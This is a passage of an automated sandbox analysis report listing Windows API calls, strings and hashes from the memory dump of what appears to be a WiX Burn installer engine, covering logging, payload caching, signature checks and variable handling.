                                                                                                                • Instruction Fuzzy Hash: 6741B673940666BBC7129BA1CC85FEFBB6CBFC5720F000226BA15A7151DBB0AD5097E0
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 009B3BA2
                                                                                                                • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 009B3BAC
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 009B3C15
                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 009B3C1C
                                                                                                                • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 009B3CA6
                                                                                                                Strings
                                                                                                                • Failed to get length of temp folder., xrefs: 009B3C06
                                                                                                                • Failed to format session id as a string., xrefs: 009B3C4A
                                                                                                                • Failed to get length of session id string., xrefs: 009B3C71
                                                                                                                • %u\, xrefs: 009B3C36
                                                                                                                • Failed to copy temp folder., xrefs: 009B3CCF
                                                                                                                • crypt32.dll, xrefs: 009B3B61
                                                                                                                • Failed to get temp folder., xrefs: 009B3BDA
                                                                                                                • logging.cpp, xrefs: 009B3BD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                                                                • API String ID: 2407829081-3274134579
                                                                                                                • Opcode ID: 58a4f57265d3f6b6f825e0f30b514fedd0125c4740b74e8711299419f4ce9a7e
                                                                                                                • Instruction ID: 340a7f8be76e8f2af9e00ac932774218a44cd4c445801fa9dfec8cf71d992ce2
                                                                                                                • Opcode Fuzzy Hash: 58a4f57265d3f6b6f825e0f30b514fedd0125c4740b74e8711299419f4ce9a7e
                                                                                                                • Instruction Fuzzy Hash: A241B672D8523DABDB219B908D49FEA7B78AF50720F118191FE18B7241DB749F848BD0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 009A7FC2
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009A81EA
                                                                                                                Strings
                                                                                                                • Failed to get string., xrefs: 009A81B5
                                                                                                                • feclient.dll, xrefs: 009A809D, 009A80F3, 009A8134
                                                                                                                • Failed to write variable name., xrefs: 009A81D1
                                                                                                                • Failed to get numeric., xrefs: 009A81BC
                                                                                                                • Failed to write literal flag., xrefs: 009A81C3
                                                                                                                • Failed to write variable value as number., xrefs: 009A8194
                                                                                                                • Failed to write variable value as string., xrefs: 009A81AE
                                                                                                                • Failed to write variable value type., xrefs: 009A81CA
                                                                                                                • Failed to get version., xrefs: 009A819B
                                                                                                                • Unsupported variable type., xrefs: 009A81A7
                                                                                                                • Failed to write variable count., xrefs: 009A7FDD
                                                                                                                • Failed to write included flag., xrefs: 009A81D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                • API String ID: 3168844106-2118673349
                                                                                                                • Opcode ID: e51db382b9ee0154c02e5f88e0a8dcf65a60cef4ebe0bbd96f60be485bb25100
                                                                                                                • Instruction ID: 8be1a924f48e25c259c41fd49dae0009cb304ded7df9b5b4f836e3935edf2f6f
                                                                                                                • Opcode Fuzzy Hash: e51db382b9ee0154c02e5f88e0a8dcf65a60cef4ebe0bbd96f60be485bb25100
                                                                                                                • Instruction Fuzzy Hash: 7471B172D0826AEFCB129FA4C841BAF7BA8FF45314F108526F90167250DB34DE129BD1
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,009BA843,00000000,00000000,00000000,?,00000000), ref: 009B97CD
                                                                                                                • GetLastError.KERNEL32(?,009BA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009B97DD
                                                                                                                  • Part of subcall function 009E4102: Sleep.KERNEL32(?,00000000,?,009B85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,009A4DBC), ref: 009E4119
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009B98E9
                                                                                                                Strings
                                                                                                                • Failed to move %ls to %ls, xrefs: 009B98C1
                                                                                                                • Failed to copy %ls to %ls, xrefs: 009B98D7
                                                                                                                • %ls payload from working path '%ls' to path '%ls', xrefs: 009B9894
                                                                                                                • Failed to verify payload signature: %ls, xrefs: 009B9838
                                                                                                                • Failed to open payload in working path: %ls, xrefs: 009B980C
                                                                                                                • Moving, xrefs: 009B987F
                                                                                                                • cache.cpp, xrefs: 009B9801
                                                                                                                • Failed to verify payload hash: %ls, xrefs: 009B9875
                                                                                                                • Copying, xrefs: 009B9888, 009B9893
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                • API String ID: 1275171361-1604654059
                                                                                                                • Opcode ID: 08cba6f9722b486351db0ecd45730acaa3a77c55ea17e5ba7eb6f73c9801aa26
                                                                                                                • Instruction ID: 0a4b6d38ce7963a0878cd25b4c7d66ec53ddc459d1e70126e76644b437e78019
                                                                                                                • Opcode Fuzzy Hash: 08cba6f9722b486351db0ecd45730acaa3a77c55ea17e5ba7eb6f73c9801aa26
                                                                                                                • Instruction Fuzzy Hash: C2316C729606797BCA322A559D4AFFF2A5CDF82F70F010114FF107B281D2A0DC0096E1
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 009A65FC
                                                                                                                  • Part of subcall function 009E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,009A5EB2,00000000), ref: 009E0AE0
                                                                                                                  • Part of subcall function 009E0ACC: GetProcAddress.KERNEL32(00000000), ref: 009E0AE7
                                                                                                                  • Part of subcall function 009E0ACC: GetLastError.KERNEL32(?,?,?,009A5EB2,00000000), ref: 009E0AFE
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009A6628
                                                                                                                • GetLastError.KERNEL32 ref: 009A6636
                                                                                                                • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 009A666E
                                                                                                                • GetLastError.KERNEL32 ref: 009A6678
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009A66BB
                                                                                                                • GetLastError.KERNEL32 ref: 009A66C5
                                                                                                                Strings
                                                                                                                • Failed to get 32-bit system folder., xrefs: 009A66A6
                                                                                                                • Failed to backslash terminate system folder., xrefs: 009A6708
                                                                                                                • Failed to get 64-bit system folder., xrefs: 009A6664
                                                                                                                • variable.cpp, xrefs: 009A665A, 009A669C
                                                                                                                • Failed to set system folder variant value., xrefs: 009A6724
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                • API String ID: 325818893-1590374846
                                                                                                                • Opcode ID: f6ae54f008ee6f99bf1d855ad0ede324874dc61b884b6a047b783db43d82b64d
                                                                                                                • Instruction ID: f6535ee2d32dc9f7b8471ee09d728c028a71b8e9d58aa0b95a0050d1f6ec3d2a
                                                                                                                • Opcode Fuzzy Hash: f6ae54f008ee6f99bf1d855ad0ede324874dc61b884b6a047b783db43d82b64d
                                                                                                                • Instruction Fuzzy Hash: FE313672D4233967CB319B618C4DB9B37ACAF02764F094555BD04BB180DB78DD408AE1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009B3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,009B3FB5,feclient.dll,?,00000000,?,?,?,009A4B12), ref: 009B3B42
                                                                                                                • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,009A4B12,?,?,009EB488,?,00000001,00000000,00000000), ref: 009B404C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseSleep
                                                                                                                • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                • API String ID: 2834455192-2673269691
                                                                                                                • Opcode ID: 34627c8cf1c6d0e6a64069339224fe027ec6ca5002cb4249da31517749a3259e
                                                                                                                • Instruction ID: 1f79b7397a5550ecb179ee572870caa306700ead95bbf5b27e70da607260657b
                                                                                                                • Opcode Fuzzy Hash: 34627c8cf1c6d0e6a64069339224fe027ec6ca5002cb4249da31517749a3259e
                                                                                                                • Instruction Fuzzy Hash: C361F471A04219BBDF22AF68CE42BB677BCEF64360B048165FD00DB142E774ED90A790
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000001,?,00000000,009A5445,00000006,?,009A82B9,?,?,?,00000000,00000000,00000001), ref: 009A6DC8
                                                                                                                  • Part of subcall function 009A56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,009A6595,009A6595,?,009A563D,?,?,00000000), ref: 009A56E5
                                                                                                                  • Part of subcall function 009A56A9: GetLastError.KERNEL32(?,009A563D,?,?,00000000,?,?,009A6595,?,009A7F02,?,?,?,?,?), ref: 009A5714
                                                                                                                • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,009A82B9), ref: 009A6F59
                                                                                                                Strings
                                                                                                                • Failed to set value of variable: %ls, xrefs: 009A6F41
                                                                                                                • Setting numeric variable '%ls' to value %lld, xrefs: 009A6EFA
                                                                                                                • Setting hidden variable '%ls', xrefs: 009A6E86
                                                                                                                • variable.cpp, xrefs: 009A6E4B
                                                                                                                • Setting string variable '%ls' to value '%ls', xrefs: 009A6EED
                                                                                                                • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 009A6F6B
                                                                                                                • Unsetting variable '%ls', xrefs: 009A6F15
                                                                                                                • Failed to insert variable '%ls'., xrefs: 009A6E0D
                                                                                                                • Attempt to set built-in variable value: %ls, xrefs: 009A6E56
                                                                                                                • Failed to find variable value '%ls'., xrefs: 009A6DE3
                                                                                                                • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 009A6ED0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                • API String ID: 2716280545-445000439
                                                                                                                • Opcode ID: c1c147f4e6803ed96aea60fcec3d81dde0f7dd6982906043a6ea53272857cb9e
                                                                                                                • Instruction ID: b28504063fdea29210d59d881527c80df6e6e14bad4be10afe33777fa7818d8c
                                                                                                                • Opcode Fuzzy Hash: c1c147f4e6803ed96aea60fcec3d81dde0f7dd6982906043a6ea53272857cb9e
                                                                                                                • Instruction Fuzzy Hash: DE5109B1A40255EBDB319F2ACC4AF6B3BACEBD7714F290419F844662C2C275DC51CAE1
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 009B2C8A
                                                                                                                Strings
                                                                                                                • wininet.dll, xrefs: 009B2ED7
                                                                                                                • Failed to add dependents ignored from command-line., xrefs: 009B2D3F
                                                                                                                • Failed to allocate registration action., xrefs: 009B2CF3
                                                                                                                • Failed to add registration action for dependent related bundle., xrefs: 009B2F8E
                                                                                                                • Failed to check for remaining dependents during planning., xrefs: 009B2E30
                                                                                                                • Failed to add registration action for self dependent., xrefs: 009B2F57
                                                                                                                • Failed to create the string dictionary., xrefs: 009B2CC3
                                                                                                                • Failed to add dependent bundle provider key to ignore dependents., xrefs: 009B2DF4
                                                                                                                • Failed to add self-dependent to ignore dependents., xrefs: 009B2D0E
                                                                                                                • crypt32.dll, xrefs: 009B2CD5, 009B2DCF, 009B2EC4, 009B2F39
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                • API String ID: 1825529933-1705955799
                                                                                                                • Opcode ID: 4e83f7a4f5a1f7e7dc1380c43a7011744ca776b20e4f36abe7df30250bae9a27
                                                                                                                • Instruction ID: 56ca10faabf381072a1cce2e5abe42f9e1fe56b43a3a1d85f4e85284c50bef8e
                                                                                                                • Opcode Fuzzy Hash: 4e83f7a4f5a1f7e7dc1380c43a7011744ca776b20e4f36abe7df30250bae9a27
                                                                                                                • Instruction Fuzzy Hash: 9AB16C70A0021AEBCF2A9F65CA41BEEBBB9FF44720F108169F815AB251C734D950CBD1
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009BF947
                                                                                                                • UuidCreate.RPCRT4(?), ref: 009BFA2A
                                                                                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 009BFA4B
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 009BFAF4
                                                                                                                Strings
                                                                                                                • Failed to set update bundle., xrefs: 009BFACE
                                                                                                                • Failed to create bundle update guid., xrefs: 009BFA37
                                                                                                                • Failed to default local update source, xrefs: 009BF9B7
                                                                                                                • update\%ls, xrefs: 009BF9A3
                                                                                                                • Failed to convert bundle update guid into string., xrefs: 009BFA6A
                                                                                                                • EngineForApplication.cpp, xrefs: 009BFA60
                                                                                                                • Failed to recreate command-line for update bundle., xrefs: 009BFA12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                • API String ID: 171215650-2594647487
                                                                                                                • Opcode ID: fbaccd7f9b093040d2ab5542ad8c1c827589262b8c19e67a2fc224fbd45c1a4f
                                                                                                                • Instruction ID: 8918f494abb80de25638717440850b741f7c85190d14d4265b13df89b9a9f98e
                                                                                                                • Opcode Fuzzy Hash: fbaccd7f9b093040d2ab5542ad8c1c827589262b8c19e67a2fc224fbd45c1a4f
                                                                                                                • Instruction Fuzzy Hash: 86619F31A40219ABCF259FA4CD55FEEBBB8EF48720F114179F908AB252D7719C10CB91
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 009A4C64
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009A4C75
                                                                                                                Strings
                                                                                                                • Failed to check global conditions, xrefs: 009A4B49
                                                                                                                • Failed to query registration., xrefs: 009A4BAE
                                                                                                                • Failed while running , xrefs: 009A4C2A
                                                                                                                • Failed to set layout directory variable to value provided from command-line., xrefs: 009A4C06
                                                                                                                • Failed to open log., xrefs: 009A4B18
                                                                                                                • Failed to set action variables., xrefs: 009A4BC4
                                                                                                                • WixBundleLayoutDirectory, xrefs: 009A4BF5
                                                                                                                • Failed to create the message window., xrefs: 009A4B98
                                                                                                                • Failed to set registration variables., xrefs: 009A4BDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostWindow
                                                                                                                • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                • API String ID: 3618638489-3051724725
                                                                                                                • Opcode ID: 0c1340eecd2b9da9ca65565ab18e4f15d7d7f79e702431d6d470cdca463865d9
                                                                                                                • Instruction ID: 0910c942d1976cc3b175af9763c400c759521af0b4f6c56072d06db34a2b680b
                                                                                                                • Opcode Fuzzy Hash: 0c1340eecd2b9da9ca65565ab18e4f15d7d7f79e702431d6d470cdca463865d9
                                                                                                                • Instruction Fuzzy Hash: 2641D47160161EBBCB17AA60CD46FFBB66CFBC6764F004615B858A6150DBE0EC509AE0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 009BF06E
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009BF19B
                                                                                                                Strings
                                                                                                                • UX requested unknown approved exe with id: %ls, xrefs: 009BF0CE
                                                                                                                • Failed to copy the id., xrefs: 009BF100
                                                                                                                • Engine is active, cannot change engine state., xrefs: 009BF089
                                                                                                                • Failed to post launch approved exe message., xrefs: 009BF186
                                                                                                                • Failed to copy the arguments., xrefs: 009BF12D
                                                                                                                • EngineForApplication.cpp, xrefs: 009BF17C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                • API String ID: 1367039788-528931743
                                                                                                                • Opcode ID: 2e7e6d9a353c29ede4c0cd784c6be72726e0abc5186b50b3510e112d88fc3621
                                                                                                                • Instruction ID: 84771a04dc22d9fcb7ee74fea221039e3f6a5a6512fea0340f19992d1ac91a68
                                                                                                                • Opcode Fuzzy Hash: 2e7e6d9a353c29ede4c0cd784c6be72726e0abc5186b50b3510e112d88fc3621
                                                                                                                • Instruction Fuzzy Hash: FD31B072A48229EBCB219F68DD59EAB77A8EF44730B018825FD04EF251EB75DD0087D0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,009BA7D4,00000000,00000000,00000000,?,00000000), ref: 009B96B8
                                                                                                                • GetLastError.KERNEL32(?,009BA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009B96C6
                                                                                                                  • Part of subcall function 009E4102: Sleep.KERNEL32(?,00000000,?,009B85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,009A4DBC), ref: 009E4119
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009B97A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                • API String ID: 1275171361-1187406825
                                                                                                                • Opcode ID: 8a773e4ac7a22495436ce77f50a77bbe6b8c32e0d78447129095461766461973
                                                                                                                • Instruction ID: d922a8627b5c1aedd74cbc2a1c076f43f6e80074e2c2d6be494273df3b28da33
                                                                                                                • Opcode Fuzzy Hash: 8a773e4ac7a22495436ce77f50a77bbe6b8c32e0d78447129095461766461973
                                                                                                                • Instruction Fuzzy Hash: 0A215A32A602697BDA321A558DC6FFB269CDFC1B70F100114FF10BF2C1D691AD0186E1
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 009A6FB2
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009A71BE
                                                                                                                Strings
                                                                                                                • Failed to read variable value as string., xrefs: 009A718B
                                                                                                                • Failed to read variable count., xrefs: 009A6FD2
